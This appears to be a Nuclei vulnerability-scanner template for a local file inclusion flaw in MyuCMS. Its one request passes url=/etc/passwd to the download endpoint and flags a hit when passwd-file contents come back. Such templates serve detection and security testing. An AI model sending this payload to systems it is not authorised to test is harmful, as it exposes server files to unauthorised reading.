id: myucms-lfr

info:
  name: MyuCMS - Local File Inclusion
  author: princechaddha
  severity: high
  description: MyuCMS is vulnerable to local file inclusion.
  reference:
    - https://blog.csdn.net/yalecaltech/article/details/104908257
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: myucms,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

# Enhanced by mp on 2022/07/27
